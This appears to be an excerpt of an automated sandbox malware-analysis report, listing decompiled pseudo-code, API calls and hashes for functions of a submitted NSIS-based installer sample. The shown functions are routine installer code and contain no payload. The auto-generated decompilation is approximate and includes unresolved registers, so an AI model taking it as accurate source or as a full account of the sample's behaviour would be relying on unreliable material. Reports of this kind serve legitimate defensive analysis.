                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: a2c242148dc3c677032a687e8abf1404ba8d4deb6f82bedad63dbcc1da1df6a6
                                                • Instruction ID: 0efe9cfabf2a96ab48011e4b47a4fb62740c17006f33e999f6b24dd419712d1f
                                                • Opcode Fuzzy Hash: a2c242148dc3c677032a687e8abf1404ba8d4deb6f82bedad63dbcc1da1df6a6
                                                • Instruction Fuzzy Hash: 535180BA504301DFD709EF6AE948F1577B8FB45315B245916E90EDB250E730EA01CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				void* _t24;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				signed int _t32;
                                                				void* _t35;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __edi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x28);
                                                				_t40 = __edx - 0x38;
                                                				 *(_t35 - 0x10) = _t14;
                                                				_t27 = 0 | _t40 == 0x00000000;
                                                				_t32 = _t40 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                					} else {
                                                						E00402DA6(0x21);
                                                						E0040655F("C:\Users\engineer\AppData\Local\Temp\nss732B.tmp", "C:\Users\engineer\AppData\Local\Temp\nss732B.tmp\System.dll", 0x400);
                                                						_t17 = lstrlenA("C:\Users\engineer\AppData\Local\Temp\nss732B.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402D84(1);
                                                					 *0x40adf0 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t29 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t31 = E0040649D(_t27, _t29);
                                                					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                						_t14 = E004060DF(_t31, "C:\Users\engineer\AppData\Local\Temp\nss732B.tmp\System.dll",  *(_t35 + 8));
                                                						_t42 = _t14;
                                                						if(_t42 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nss732B.tmp$C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll
                                                • API String ID: 1659193697-2684543560
                                                • Opcode ID: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                • Opcode Fuzzy Hash: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					__eflags =  *0x42aa20; // 0x0
                                                					if(__eflags == 0) {
                                                						_t2 = GetTickCount();
                                                						__eflags = _t2 -  *0x434f0c;
                                                						if(_t2 >  *0x434f0c) {
                                                							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                							 *0x42aa20 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406946(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x42aa20; // 0x0
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x42aa20 = 0;
                                                					return _t6;
                                                				}
                                                			}






                                                0x00403020
                                                0x0040303a
                                                0x00403040
                                                0x0040304a
                                                0x00403050
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x42d254 = _t16;
                                                							E00404ED4();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404E54(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004044E5(0x413);
                                                				return 0;
                                                			}





                                                0x00405517
                                                0x00405521
                                                0x0040553d
                                                0x0040555f
                                                0x00405562
                                                0x00405568
                                                0x00405572
                                                0x00405573
                                                0x00405575
                                                0x0040557b
                                                0x0040557b
                                                0x00405585
                                                0x00000000
                                                0x00405593
                                                0x0040554a
                                                0x00405582
                                                0x00405582
                                                0x00000000
                                                0x00405582
                                                0x00405556
                                                0x00405558
                                                0x00000000
                                                0x00405558
                                                0x00405527
                                                0x00000000
                                                0x00000000
                                                0x0040552e
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B57() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x42b22c;
                                                				_t3 = E00403B3C(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                				return _t3;
                                                			}







                                                0x00403b58
                                                0x00403b60
                                                0x00403b67
                                                0x00403b6a
                                                0x00403b6a
                                                0x00403b6c
                                                0x00403b71
                                                0x00403b78
                                                0x00403b7e
                                                0x00403b82
                                                0x00403b83
                                                0x00403b8b

                                                APIs
                                                • FreeLibrary.KERNEL32(?,76F1FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                • GlobalFree.KERNEL32 ref: 00403B78
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3936084776
                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405fa2
                                                0x00405fa4
                                                0x00405fa7
                                                0x00405fd3
                                                0x00405fac
                                                0x00405fb5
                                                0x00405fba
                                                0x00405fc5
                                                0x00405fc8
                                                0x00405fe4
                                                0x00405fca
                                                0x00405fd1
                                                0x00000000
                                                0x00405fd1
                                                0x00405fdd
                                                0x00405fe1
                                                0x00405fe1
                                                0x00405fdb
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%